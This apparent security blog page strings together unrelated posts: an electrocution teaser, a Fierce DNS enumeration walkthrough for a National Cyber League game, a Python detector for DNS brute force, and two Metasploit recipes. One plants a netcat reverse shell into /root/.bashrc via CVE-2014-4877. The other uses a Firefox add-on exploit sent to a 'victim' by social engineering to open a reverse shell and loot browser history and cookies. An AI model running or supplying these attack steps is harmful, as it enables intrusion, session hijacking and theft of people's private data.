DEATH WHISTLE

The Pain of Electricity

Have you always wondered which type of electricity would hurt more if you electrocuted yourself: AC (Alternating Current) or DC (Direct Current)? Wait no more!

Fierce DNS Enumeration for National Cyber League (NCL) Regular Season Game 2

The “nslookup” command has been altered so that it can no longer perform zone transfers. Instead, check out Fierce, one of the best tools available for DNS analysis.

fierce --dnsserver 54.243.174.22 -dns flag.ncl
Trying zone transfer first...

Unsuccessful in zone transfer (it was worth a shot)
Okay, trying the good old fashioned way... brute force

Checking for wildcard DNS...
Nope. Good.
Now performing 2280 test(s)...
127.44.65.92	admin.flag.ncl
127.1.0.1	secret.flag.ncl
127.79.255.255	termserv.flag.ncl
127.2.114.31	welcome.flag.ncl
127.212.83.111	zeus.flag.ncl

Subnets found (may want to probe here using nmap or unicornscan):
	127.1.0.0-255 : 1 hostnames found.
	127.2.114.0-255 : 1 hostnames found.
	127.212.83.0-255 : 1 hostnames found.
	127.44.65.0-255 : 1 hostnames found.
	127.79.255.0-255 : 1 hostnames found.

Done with Fierce scan: http://ha.ckers.org/fierce/
Found 5 entries.

Have a nice day.

As you can see from the output above, the IP address for the domain “flag.ncl” itself is missing. An alternative tool to use instead of “dig” would be:

dnsenum --dnsserver 54.243.174.22 --enum flag.ncl
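
On the name server, the brute-force pass in the Fierce output above appears as one client requesting many distinct names under the zone and mostly receiving NXDOMAIN. The Python below is an added example, not part of the original post; the log line format, client addresses, thresholds and `hostNN` labels are constructed assumptions.

```python
from collections import defaultdict

def find_enumerators(log_lines, zone, min_names=20, min_nx_ratio=0.8, window=60):
    """Return {client: (distinct_names, nx_ratio)} for clients that, within one
    `window`-second bucket, query many distinct names under `zone` and mostly
    get NXDOMAIN: the pattern a wordlist brute force leaves on the resolver."""
    suffix = "." + zone.lower().rstrip(".")
    buckets = defaultdict(lambda: {"names": set(), "total": 0, "nx": 0})
    for line in log_lines:
        parts = line.split()
        if len(parts) != 4:
            continue  # skip malformed lines
        ts, client, qname, rcode = parts
        qname = qname.lower().rstrip(".")
        if not qname.endswith(suffix):
            continue  # only subdomains of the watched zone count
        b = buckets[(client, int(ts) // window)]
        b["names"].add(qname)
        b["total"] += 1
        b["nx"] += rcode == "NXDOMAIN"
    flagged = {}
    for (client, _), b in buckets.items():
        ratio = b["nx"] / b["total"]
        if len(b["names"]) >= min_names and ratio >= min_nx_ratio:
            # keep the busiest bucket per client
            if len(b["names"]) > flagged.get(client, (0, 0.0))[0]:
                flagged[client] = (len(b["names"]), ratio)
    return flagged

# Constructed sample log: "<epoch> <client> <qname> <rcode>" (format is an assumption)
LIVE = {"admin", "secret", "termserv", "welcome", "zeus"}  # hostnames from the scan output
WORDS = sorted(LIVE) + [f"host{i:02d}" for i in range(35)]  # hostNN labels are made up
SAMPLE_LOG = [
    f"{1020 + i} 10.0.0.5 {w}.flag.ncl {'NOERROR' if w in LIVE else 'NXDOMAIN'}"
    for i, w in enumerate(WORDS)
] + [f"{1020 + i * 10} 10.0.0.9 welcome.flag.ncl NOERROR" for i in range(5)]

if __name__ == "__main__":
    print(find_enumerators(SAMPLE_LOG, "flag.ncl"))
```

A zone with wildcard DNS answers every name, so the NXDOMAIN ratio stays near zero there and only the distinct-name count remains useful.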

Wget Exploit Demonstration: CVE-2014-4877

msf > use auxiliary/server/wget_symlink_file_write
msf auxiliary(wget_symlink_file_write) > show options
msf auxiliary(wget_symlink_file_write) > set TARGET_FILE /root/.bashrc
msf auxiliary(wget_symlink_file_write) > set TARGET_DATA nc localhost 2222 -e /bin/bash &
msf auxiliary(wget_symlink_file_write) > exploit
nc -lvp 2222
wget -m ftp://192.168.2.104:2121/

How to Get History and Cookies from Mozilla Firefox with Metasploit

Send the link to the server to the victim via chat, email or another social engineering technique. Once you have access to the victim's PC, simply run the post module to dump credentials.

msfconsole
use exploit/multi/browser/firefox_xpi_bootstrapped_addon
set payload firefox/shell_reverse_tcp
set lhost 192.168.72.128
set uripath /
exploit

How to Collect History

use post/firefox/gather/history
set payload firefox/shell_reverse_tcp
set lhost 192.168.72.128
set session 1
exploit
loot

How to Collect Cookies

use post/firefox/gather/cookies
set payload firefox/shell_reverse_tcp
set lhost 192.168.72.128
set session 1
exploit
loot